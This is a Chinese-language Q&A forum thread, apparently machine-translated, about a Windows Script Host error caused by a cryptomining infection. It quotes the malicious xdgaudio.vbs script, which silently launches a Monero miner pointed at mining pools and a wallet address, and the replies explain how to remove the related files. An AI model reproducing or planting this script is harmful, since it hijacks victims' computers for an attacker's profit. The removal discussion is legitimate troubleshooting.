Wsh 如何解决windows/xdgaudio.vbs中的错误
Windows脚本主机错误 C:\Windows\xdgaudio.vbs的内容如下所示Wsh 如何解决windows/xdgaudio.vbs中的错误,wsh,virus,mining,Wsh,Virus,Mining,Windows脚本主机错误 C:\Windows\xdgaudio.vbs的内容如下所示 Dim WShell Set WShell = CreateObject("WScript.Shell") WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing
想出来了!!简短回答:从Windows目录中删除ServiceCrssr.vbs文件,然后重新启动。实际上,尽管存在文件丢失/损坏的危险,我还是拔掉了插头,以避免程序在关机过程中试图重写任何有问题的文件 涉及许多其他文件,但删除或重命名上述文件并重新启动后,一切都很好。。。没有证据表明采矿过程正在运行。我在两台测试计算机上感染了这种病毒。这些是我通过USB连接客户受感染驱动器的唯一计算机。这东西到底是如何传播的,这仍然是个谜!其他似乎涉及的文件包括:
\Windows\winprs.bat
\Windows\winvpr.vbs
\Windows\winvprse.bat
\Windows\xdgaudio.vbs
\Windows\Prefetch\WMIPVRSE.exe-xxxxxxxx.pf
如果重命名或删除*.pf文件并重新启动,*.pf文件将使用新的随机字符来代替x来重写自身-我可以确定不会产生不良影响。在我第一台受感染的机器上,我重命名了上面所有的文件,在重命名每个文件后重新启动。我尝试的最后一个文件是servicecrsssr.vbs。在第二台受感染的测试机器上,我只重命名了servicecrsssr.vbs文件并重新启动,然后一切正常。请让我知道这对你有什么好处。谢谢 它确实是一家比特币矿商,谢天谢地,这是一家相当糟糕的矿商,而且非常明显,没有比运行后台进程更恶意的了。不过,我运行的两个反病毒/恶意软件应用程序都没有发现它。我的是在一个游戏中发现的,孩子们下载的游戏打包在一个安装文件中 反病毒程序应该很容易就能发现这一点,vbs和批处理文件非常明显。Malwarebytes最终抱怨他们调用的实际miner.exe文件,但只是在它运行之后